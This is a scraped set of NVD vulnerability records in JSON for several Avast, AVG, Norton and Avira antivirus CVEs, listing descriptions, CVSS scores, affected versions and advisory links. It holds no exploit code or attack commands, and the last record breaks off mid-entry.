{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:avast:antivirus:*:*:*:*:*:*:*:*", "matchCriteriaId": "76526B74-4398-42D9-A110-599151A4ABB7", "versionEndExcluding": "20.0", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "An issue was discovered in Avast Antivirus before 20. The aswTask RPC endpoint for the TaskEx library in the Avast Service (AvastSvc.exe) allows attackers to trigger a reboot via RPC from a Low Integrity process." }, { "lang": "es", "value": "Se detect\u00f3 un problema en Avast Antivirus versiones anteriores a 20. El endpoint de aswTask RPC para la biblioteca TaskEx en el Avast Service (AvastSvc.exe) permite a atacantes activar un reinicio por medio de una RPC a partir de un proceso Low Integrity." } ], "id": "CVE-2020-10864", "lastModified": "2024-11-21T04:56:14.870", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2020-04-01T17:15:16.047", "references": [ { "source": "cve@mitre.org", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "NVD-CWE-noinfo" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:avast:antivirus:*:*:*:*:*:*:*:*", "matchCriteriaId": "9530DCD6-2AE4-4E7E-A67A-5E5F87CE3DF3", "versionEndExcluding": "20.4", "vulnerable": true } ], "negate": false, "operator": "OR" } ] } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "Privilege escalation vulnerability in Avast Antivirus prior to 20.4 allows a local user to gain elevated privileges by \"hollowing\" trusted process which could lead to the bypassing of Avast self-defense." }, { "lang": "es", "value": "Una vulnerabilidad de escalada de privilegios en Avast Antivirus versiones anteriores a 20.4, permite a un usuario local alcanzar privilegios elevados al \"vaciar\" los procesos confiables, lo que podr\u00eda conllevar a una omisi\u00f3n de la autodefensa de Avast" } ], "id": "CVE-2021-45339", "lastModified": "2024-11-21T06:32:06.720", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2021-12-27T14:15:08.357", "references": [ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST0" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://www.avast.com/hacker-hall-of-fame/en/researcher-david-eade-reports-antitrack-bug-to-avast-0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://www.avast.com/hacker-hall-of-fame/en/researcher-david-eade-reports-antitrack-bug-to-avast-0" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-863" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
▼ | URL | Tags | |
---|---|---|---|
cve@mitre.org | https://forum.avast.com/index.php?topic=232420.0 | Release Notes, Vendor Advisory | |
cve@mitre.org | https://forum.avast.com/index.php?topic=232423.0 | Release Notes, Vendor Advisory | |
cve@mitre.org | https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md | Exploit, Third Party Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://forum.avast.com/index.php?topic=232420.0 | Release Notes, Vendor Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://forum.avast.com/index.php?topic=232423.0 | Release Notes, Vendor Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md | Exploit, Third Party Advisory |
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:avast:antivirus:*:*:*:*:*:*:*:*", "matchCriteriaId": "76526B74-4398-42D9-A110-599151A4ABB7", "versionEndExcluding": "20.0", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "An issue was discovered in Avast Antivirus before 20. The aswTask RPC endpoint for the TaskEx library in the Avast Service (AvastSvc.exe) allows attackers to achieve Arbitrary File Deletion from Avast Program Path via RPC, when Self Defense is Enabled." }, { "lang": "es", "value": "Se detect\u00f3 un problema en Avast Antivirus versiones anteriores a 20. El endpoint de aswTask RPC para la biblioteca TaskEx en el Avast Service (AvastSvc.exe) permite a atacantes lograr una Eliminaci\u00f3n de Archivos Arbitrarios de Avast Program Path por medio de una RPC, cuando Self Defense est\u00e1 Habilitada." } ], "id": "CVE-2020-10861", "lastModified": "2024-11-21T04:56:14.397", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10.0, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2020-04-01T17:15:15.877", "references": [ { "source": "cve@mitre.org", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "NVD-CWE-noinfo" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
7.8 (High) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Vendor | Product | Version | |
---|---|---|---|
avira | avira_security | * | |
norton | power_eraser | * | |
avast | antivirus | * | |
avg | antivirus | * | |
microsoft | windows | - |
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:avira:avira_security:*:*:*:*:*:windows:*:*", "matchCriteriaId": "AE949420-907D-4EBC-945B-A3EBEEC08532", "versionEndExcluding": "1.1.78", "vulnerable": true }, { "criteria": "cpe:2.3:a:norton:power_eraser:*:*:*:*:*:windows:*:*", "matchCriteriaId": "7703323C-C9D2-4338-864A-1AA2F99821FA", "versionEndExcluding": "119.1.5.1", "vulnerable": true } ], "negate": false, "operator": "OR" } ] }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:avast:antivirus:*:*:*:*:*:*:*:*", "matchCriteriaId": "22365077-58F2-4607-8EB8-79CDDF74348D", "versionEndExcluding": "22.10", "vulnerable": true }, { "criteria": "cpe:2.3:a:avg:antivirus:*:*:*:*:*:*:*:*", "matchCriteriaId": "AADAEC20-387E-4CF4-B0A5-DE5C9092C37A", "versionEndExcluding": "22.10", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "Norton, Avira, Avast and AVG Antivirus for Windows may be susceptible to a Privilege Escalation vulnerability, which is a type of issue whereby an attacker may attempt to compromise the software application to gain elevated access to resources that are normally protected from an application or user.\n" }, { "lang": "es", "value": "Norton, Avira, Avast y AVG Antivirus para Windows pueden ser susceptibles a una vulnerabilidad de escalada de privilegios, que es un tipo de problema por el cual un atacante puede intentar comprometer la aplicaci\u00f3n de software para obtener acceso elevado a recursos que normalmente est\u00e1n protegidos de una aplicaci\u00f3n o usuario." } ], "id": "CVE-2022-4294", "lastModified": "2024-11-21T07:34:57.510", "metrics": { "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.2, "source": "security@nortonlifelock.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2023-01-10T10:15:12.933", "references": [ { "source": "security@nortonlifelock.com", "tags": [ "Vendor Advisory" ], "url": "https://support.norton.com/sp/static/external/tools/security-advisories.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://support.norton.com/sp/static/external/tools/security-advisories.html" } ], "sourceIdentifier": "security@nortonlifelock.com", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-269" } ], "source": "security@nortonlifelock.com", "type": "Secondary" }, { "description": [ { "lang": "en", "value": "NVD-CWE-noinfo" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
▼ | URL | Tags | |
---|---|---|---|
cve@mitre.org | https://forum.avast.com/index.php?topic=232420.0 | Release Notes, Vendor Advisory | |
cve@mitre.org | https://forum.avast.com/index.php?topic=232423.0 | Release Notes, Vendor Advisory | |
cve@mitre.org | https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md | Exploit, Third Party Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://forum.avast.com/index.php?topic=232420.0 | Release Notes, Vendor Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://forum.avast.com/index.php?topic=232423.0 | Release Notes, Vendor Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md | Exploit, Third Party Advisory |
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:avast:antivirus:*:*:*:*:*:*:*:*", "matchCriteriaId": "76526B74-4398-42D9-A110-599151A4ABB7", "versionEndExcluding": "20.0", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "An issue was discovered in Avast Antivirus before 20. The aswTask RPC endpoint for the TaskEx library in the Avast Service (AvastSvc.exe) allows attackers to trigger a shutdown via RPC from a Low Integrity process via TempShutDownMachine." }, { "lang": "es", "value": "Se detect\u00f3 un problema en Avast Antivirus versiones anteriores a 20. El endpoint de aswTask RPC para la biblioteca TaskEx en el Avast Service (AvastSvc.exe) permite a atacantes desencadenar un apagado por medio de una RPC a partir de un proceso Low Integrity por medio de TempShutDownMachine." } ], "id": "CVE-2020-10863", "lastModified": "2024-11-21T04:56:14.720", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2020-04-01T17:15:15.987", "references": [ { "source": "cve@mitre.org", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "NVD-CWE-noinfo" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
▼ | URL | Tags | |
---|---|---|---|
cve@mitre.org | http://nestedif.com/avast-antivirus-password-manager-vulnerability-improper-session-handling-leading-to-information-disclosure-advisory/ | Third Party Advisory, URL Repurposed | |
af854a3a-2127-422b-91ae-364da2661108 | http://nestedif.com/avast-antivirus-password-manager-vulnerability-improper-session-handling-leading-to-information-disclosure-advisory/ | Third Party Advisory, URL Repurposed |
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:avast:antivirus:20.1.5069.562:*:*:*:*:*:*:*", "matchCriteriaId": "6C61B0A2-FFE9-4BAC-9761-5F626E443F29", "vulnerable": true } ], "negate": false, "operator": "OR" } ] } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "An issue was discovered in the Login Password feature of the Password Manager component in Avast Antivirus 20.1.5069.562. An entered password continues to be stored in Windows main memory after a logout, and after a Lock Vault operation." }, { "lang": "es", "value": "Se detect\u00f3 un problema en la funcionalidad Login Password del componente Password Manager en Avast Antivirus versi\u00f3n 20.1.5069.562.\u0026#xa0;La contrase\u00f1a ingresada sigue siendo almacenada en la memoria principal de Windows despu\u00e9s de cerrar la sesi\u00f3n y despu\u00e9s de una operaci\u00f3n de Lock Vault" } ], "id": "CVE-2020-15024", "lastModified": "2024-11-21T05:04:38.823", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 2.1, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2020-09-10T18:15:12.637", "references": [ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "URL Repurposed" ], "url": "http://nestedif.com/avast-antivirus-password-manager-vulnerability-improper-session-handling-leading-to-information-disclosure-advisory/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "URL Repurposed" ], "url": "http://nestedif.com/avast-antivirus-password-manager-vulnerability-improper-session-handling-leading-to-information-disclosure-advisory/" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-212" }, { "lang": "en", "value": "CWE-459" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
5.5 (Medium) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:avast:antivirus:*:*:*:*:*:macos:*:*", "matchCriteriaId": "332D750A-C14D-4E7D-8296-99B46A1155A4", "versionEndExcluding": "24092400", "vulnerable": true }, { "criteria": "cpe:2.3:a:avg:antivirus:*:*:*:*:*:macos:*:*", "matchCriteriaId": "D2EB9416-935A-4FF0-AD75-DFCDD6BC1AFF", "versionEndExcluding": "24092400", "vulnerable": true } ], "negate": false, "operator": "OR" } ] } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "A null-pointer-dereference in the signature verification module in AVG/Avast Antivirus signature \u003c24092400 released on 24/Sep/2024 on MacOS may allow a malformed xar file to crash the application during processing." }, { "lang": "es", "value": "Una desreferencia de puntero nulo en el m\u00f3dulo de verificaci\u00f3n de firma en la firma AVG/Avast Antivirus \u0026lt;24092400 publicada el 24/sep/2024 en MacOS puede permitir que un archivo xar mal formado bloquee la aplicaci\u00f3n durante el procesamiento." } ], "id": "CVE-2024-9483", "lastModified": "2024-11-08T20:54:30.980", "metrics": { "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.4, "impactScore": 3.6, "source": "security@nortonlifelock.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2024-10-04T13:15:12.980", "references": [ { "source": "security@nortonlifelock.com", "tags": [ "Not Applicable" ], "url": "https://support.norton.com/sp/static/external/tools/security-advisories.html" } ], "sourceIdentifier": "security@nortonlifelock.com", "vulnStatus": "Analyzed", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-476" } ], "source": "security@nortonlifelock.com", "type": "Secondary" }, { "description": [ { "lang": "en", "value": "CWE-476" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
4.7 (Medium) - CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:avast:antivirus:*:*:*:*:*:*:*:*", "matchCriteriaId": "041E50BD-12AB-47A1-98FF-5A9DAFC82247", "versionEndExcluding": "22.11", "versionStartIncluding": "22.5", "vulnerable": true }, { "criteria": "cpe:2.3:a:avg:anti-virus:*:*:*:*:*:*:*:*", "matchCriteriaId": "E6C5599E-6B91-463D-B715-2962E9E98764", "versionEndExcluding": "22.11", "versionStartIncluding": "22.5", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "Avast and AVG Antivirus for Windows were susceptible to a Time-of-check/Time-of-use (TOCTOU) vulnerability in the restore process leading to arbitrary file creation. The issue was fixed with Avast and AVG Antivirus version 22.11" } ], "id": "CVE-2023-1586", "lastModified": "2024-11-21T07:39:29.733", "metrics": { "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L", "version": "3.1" }, "exploitabilityScore": 1.0, "impactScore": 5.5, "source": "security@nortonlifelock.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 4.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 1.0, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2023-04-19T19:15:06.837", "references": [ { "source": "security@nortonlifelock.com", "tags": [ "Third Party Advisory" ], "url": "https://support.norton.com/sp/static/external/tools/security-advisories.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://support.norton.com/sp/static/external/tools/security-advisories.html" } ], "sourceIdentifier": "security@nortonlifelock.com", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-367" } ], "source": "security@nortonlifelock.com", "type": "Secondary" }, { "description": [ { "lang": "en", "value": "CWE-367" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
5.5 (Medium) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:avast:antivirus:*:*:*:*:*:macos:*:*", "matchCriteriaId": "332D750A-C14D-4E7D-8296-99B46A1155A4", "versionEndExcluding": "24092400", "vulnerable": true }, { "criteria": "cpe:2.3:a:avg:antivirus:*:*:*:*:*:macos:*:*", "matchCriteriaId": "D2EB9416-935A-4FF0-AD75-DFCDD6BC1AFF", "versionEndExcluding": "24092400", "vulnerable": true } ], "negate": false, "operator": "OR" } ] } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "An out-of-bounds write in the engine module in AVG/Avast Antivirus signature \u003c24092400 released on 24/Sep/2024 on MacOS allows a malformed Mach-O file to crash the application during file processing." }, { "lang": "es", "value": "Una escritura fuera de los l\u00edmites en el m\u00f3dulo del motor en la firma AVG/Avast Antivirus \u0026lt;24092400 publicada el 24/sep/2024 en MacOS permite que un archivo Mach-O malformado bloquee la aplicaci\u00f3n durante el procesamiento del archivo." } ], "id": "CVE-2024-9482", "lastModified": "2024-11-08T20:49:58.077", "metrics": { "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.4, "impactScore": 3.6, "source": "security@nortonlifelock.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 